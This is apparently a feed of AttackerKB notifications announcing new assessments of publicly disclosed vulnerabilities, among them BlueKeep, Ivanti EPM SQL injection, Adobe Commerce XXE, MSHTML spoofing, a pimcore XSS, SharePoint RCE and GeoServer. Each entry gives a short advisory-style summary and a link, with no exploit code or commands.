New assessment for topic: Windows Remote Desktop (RDP) Use-after-free vulnerablility, "Bluekeep"

Topic description: "A bug in Windows Remote Desktop protocol allows unauthenticated users to run arbitrary code via a specially crafted request to the service ..."

"Exploited by North Korean state-sponsored attackers according to a July 2024 bulletin from multiple U.S ..."

Link: https://attackerkb.com/assessments/8909df99-507f-4f27-a36b-9c759f2b5a9f

New assessment for topic: CVE-2024-29824

Topic description: "An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code. ..."

"Ivanti Endpoint Manager (EPM) versions 2022 SU5 and prior are vulnerable to SQL injection and a patch has been released, as described in the official [advisory](https://forums.ivanti.com/s/article/Security-Advisory-May-2024) and the related [KB article](https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024) ..."

Link: https://attackerkb.com/assessments/721f9e58-f1a2-4da1-9bdc-21a2c2e0a139

New assessment for topic: CVE-2024-34102

Topic description: "Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution ..."

"Adobe Commerce, which is based on the Magento PHP suite, is a popular framework for commerce websites ..."

Link: https://attackerkb.com/assessments/d33dff0d-d59a-4d35-ae3b-542784621174

New assessment for topic: CVE-2024-38112

Topic description: "Windows MSHTML Platform Spoofing Vulnerability ..."

"Trend Micro reported this vulnerability to Microsoft after observing [Void Banshee APT exploitation in the wild](https://www.trendmicro.com/en_id/research/24/g/CVE-2024-38112-void-banshee.html); the zero-day attack hinged on the premise that MHTML links would automatically open in the old Internet Explorer engine ..."

Link: https://attackerkb.com/assessments/ee90728c-07aa-4213-b028-b960f305ae9c

New assessment for topic: CVE-2022-0510

Topic description: "Cross-site Scripting (XSS) - Reflected in Packagist pimcore/pimcore prior to 10.3.1. ..."

"Missing Sanitization of `$item->getGroup()` (lines 864 and 1269) in `fieldcollectionTreeAction/objectbrickTreeAction` functions in `bundles/AdminBundle/Controller/Admin/DataObject/ClassController.php` allows Admin User to perform Source Code Injection through Stored Group Fields (in Object Bricks/Field Collection under settings module) resulting in Information Exposure (cookie theft). ..."

Link: https://attackerkb.com/assessments/cd11e0f9-6a68-4d14-b233-1fa6126daceb

New assessment for topic: CVE-2024-38023

Topic description: "Microsoft SharePoint Server Remote Code Execution Vulnerability ..."

"This vulnerability also requires authentication, but any SharePoint user with Site Owner permissions can hit it ..."

Link: https://attackerkb.com/assessments/876bb98d-a8d3-4b1c-8e7c-f270880d3f1e

New assessment for topic: CVE-2024-36401

Topic description: "GeoServer is an open source server that allows users to share and edit geospatial data ..."

"[metadata only] ..."

Link: https://attackerkb.com/assessments/becffd24-1aa0-4f40-8adb-2427538a6c7a